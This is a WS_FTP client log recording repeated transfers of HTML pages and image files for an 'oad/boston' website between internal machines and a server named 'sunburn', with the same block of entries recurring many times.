10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
